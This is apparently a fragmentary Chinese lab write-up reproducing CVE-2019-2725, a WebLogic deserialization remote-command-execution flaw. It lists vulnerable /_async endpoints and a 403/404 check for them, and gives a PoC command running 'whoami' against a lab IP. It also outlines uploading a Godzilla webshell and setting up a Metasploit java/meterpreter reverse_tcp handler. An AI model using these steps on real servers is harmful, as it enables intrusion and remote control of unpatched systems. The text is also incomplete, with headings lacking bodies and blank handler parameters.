- 漏洞名称
- 漏洞编号
- 漏洞描述
- 影响版本
- 漏洞存在
- 复现
- 第一步 访问控制台
- 第二步 使用weblogicScan进行扫描,发现存在该漏洞
- 漏洞复现一(poc)
- 执行命令:
- 上传webshell
- 漏洞复现二
- 下载地址
- 漏洞检查
- 命令执行
- 上传哥斯特马,并进行连接
- 哥斯特与msf联动
- 笔记下载
- 免责声明
- weblogic反序列化远程命令执行漏洞
- CVE-2019-2725
-
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,
-
这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,
-
通过针对Oracle官网历年来的补丁构造payload来绕过。
- weblogic 10.x
- weblogic 12.1.3
/_async/AsyncResponseService /_async/AsyncResponseServiceJms /_async/AsyncResponseServiceHttps /_async/AsyncResponseServiceSoap12 /_async/AsyncResponseServiceSoap12Jms /_async/AsyncResponseServiceSoap12Https
http://192.168.253.143:7001/_async/AsyncResponseService
http://192.168.253.143:7001/_async/# 返回403则存在,返回404则不存在
http://192.168.253.143:7001/console/login/LoginForm.jsp
python weblogic-2019-2725.py 10.3.6 http://192.168.253.143:7001 whoami
https://github.com/shack2/javaserializetools/releases/tag/1.0.20190828
漏洞检查 命令执行 上传哥斯特马,并进行连接
kali中msfconsole use exploit/multi/handler set payload /java/meterpreter/reverse_tcp set lhost set lport run
https://download.csdn.net/download/qq_41901122/54162206
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!



